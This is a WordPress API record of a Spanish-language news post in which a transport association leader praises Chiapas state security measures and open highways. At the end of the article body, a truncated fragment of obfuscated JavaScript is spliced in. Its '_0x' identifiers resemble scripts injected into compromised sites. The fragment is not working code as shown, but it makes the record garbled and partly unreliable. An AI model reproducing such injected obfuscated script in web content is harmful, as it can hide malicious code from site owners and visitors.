{"id":22094,"date":"2025-05-27T03:50:59","date_gmt":"2025-05-27T03:50:59","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22094"},"modified":"2025-05-27T03:51:00","modified_gmt":"2025-05-27T03:51:00","slug":"acciones-de-seguridad-garantizan-el-libre-transito-y-la-paz","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22094","title":{"rendered":"Acciones de seguridad garantizan el libre tr\u00e1nsito y la paz"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000137400-1024x576.jpg\" alt=\"\" class=\"wp-image-22095\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000137400-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000137400-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000137400-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000137400-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000137400.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>26 de mayo del 2025. Tuxtla Guti\u00e9rrez.- Jes\u00fas P\u00e9rez Garc\u00eda, Presidente Nacional de la Alianza de Transporte (AMTAC), reconoci\u00f3 las acciones de seguridad emprendidas por el estado han sido bien recibidas por los sectores empresariales, transportistas, y sociales ya que garantizan el libre tr\u00e1nsito y la paz.<\/p>\n\n\n\n<p>Expres\u00f3 que: \u201cEl trabajo que se ha venido realizando en la actualidad en Chiapas con el tema de seguridad es positivo, lo que ha brindado tranquilidad y certeza, sobre todo para sectores transportistas que ahora tienen la oportunidad de transitar sin bloqueos, y con mayor seguridad, lo que ha sido el compromiso del propio ejecutivo estatal\u201d,<\/p>\n\n\n\n<p>En este sentido destac\u00f3 que la estrategia de seguridad que se ha venido implementando se puede ver y palpar con el trabajo que realizan las corporaciones.<\/p>\n\n\n\n<p>\u201cComo es el caso de la Secretaria de Seguridad del Pueblo, que encabeza \u00d3scar Alberto Aparicio Avenda\u00f1o, y que se ha comprometido a brindar acciones contundentes en favor de la seguridad\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Como muestra de ello, dijo, que la econom\u00eda ha ido recuper\u00e1ndose gracias a la estrategia de seguridad del gobernador Eduardo Ram\u00edrez Aguilar.<\/p>\n\n\n\n<p>\u201cHoy en d\u00eda transitamos con certidumbre y confianza gracias a que tenemos carreteras vigiladas por el grupo Pakal a cargo del secretario de seguridad Oscar Alberto Aparicio Avenda\u00f1o, lo que vemos de manera positiva, por que ahora la comercializaci\u00f3n, tr\u00e1nsito, y seguridad en las carreteras de Chiapas es una garant\u00eda\u201d, puntualiz\u00f3.<\/p>\n\n\n\n<p>Agreg\u00f3 que, como sector transportistas en Chiapas y con presencia nacional, han tenido como prioridad el dialogo, la concertaci\u00f3n y el trabajo conjunto que permitan garant\u00edas para los transportistas y la sociedad en general.<\/p>\n\n\n\n<p>\u201cPor lo que en Chiapas la apertura del dialogo, mesas de trabajo, hoy est\u00e9n dando resultados, lo cual se trasmite en ganancias, activaci\u00f3n de la econom\u00eda local, y con esto estabilidad social\u201d, asever\u00f3.<\/p>\n\n\n\n<p>Inform\u00f3 que, desde el inicio de la administraci\u00f3n tuvimos encuentros y mesas de trabajo con la Secretaria de Seguridad del Pueblo, lo cual de primera instancia se hizo algo muy positivo, \u201cporque nos han escuchado, han actuado de acuerdo a la necesidad de diversos sectores del transporte, y hoy se puede ver en las carreteras, de la entidad\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 26 de mayo del 2025. Tuxtla Guti\u00e9rrez.- Jes\u00fas P\u00e9rez Garc\u00eda, Presidente Nacional de la Alianza de Transporte (AMTAC), reconoci\u00f3 las acciones de seguridad emprendidas por el estado han sido bien recibidas por los sectores empresariales, transportistas, y sociales ya que garantizan el libre tr\u00e1nsito y la paz. Expres\u00f3 que: \u201cEl trabajo que se &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22095,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22094","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22094","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22094"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22094\/revisions"}],"predecessor-version":[{"id":22096,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22094\/revisions\/22096"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22095"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22094"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22094"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22094"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}